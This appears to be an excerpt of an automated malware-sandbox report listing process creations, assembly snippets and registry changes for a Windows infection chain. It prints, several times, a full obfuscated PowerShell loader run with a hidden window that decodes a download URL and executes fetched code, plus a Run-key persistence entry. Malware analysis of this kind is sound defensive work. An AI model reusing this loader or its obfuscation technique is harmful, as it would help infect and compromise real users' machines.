VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.tooJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePan
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.tooJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF849005479 push ebp; iretd 2_2_00007FF849005538
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8490083A8 push eax; iretd 2_2_00007FF8490083A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0415EC78 pushfd ; retf 6_2_0415EC79
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04151C3F pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04151C27 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04151C43 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04151BF9 pushad ; iretd 6_2_04151C49
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06FD1FC8 push eax; mov dword ptr [esp], ecx6_2_06FD21B4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08AC3881 push esi; retf 6_2_08AC3882
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08AC0E2A pushad ; ret 6_2_08AC0E3D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08AC3478 push A6294078h; ret 6_2_08AC3482
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08AC0C74 push 3777AA36h; iretd 6_2_08AC0C88
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08ABF856 push esp; ret 6_2_08ABF858
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08ABF99D push esp; ret 6_2_08ABF9A4
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_08AC2160 push FFFFFFECh; ret 6_2_08AC2162
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213709AD push ecx; mov dword ptr [esp], ecx10_2_213709B6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C12160 push FFFFFFECh; ret 10_2_02C12162
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C13478 push A6294078h; ret 10_2_02C13482
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C13881 push esi; retf 10_2_02C13882
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C0F856 push esp; ret 10_2_02C0F858
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C0F99D push esp; ret 10_2_02C0F9A4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C10E2A pushad ; ret 10_2_02C10E3D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02C10C74 push 3777AA36h; iretd 10_2_02C10C88
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C9C217 pushfd ; retf 13_2_03C9C235
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C9C236 pushfd ; retf 13_2_03C9C235
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C841E3 push es; iretd 13_2_03C841E4
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C9C1F2 push esi; ret 13_2_03C9C201
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C80945 push ss; retf 0001h13_2_03C8094D
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C7E094 push B72FAC86h; retf 13_2_03C7E09F
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeCode function: 13_2_03C7E0A0 push edi; iretd 13_2_03C7E0A8
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FLY4HJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FLY4HJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
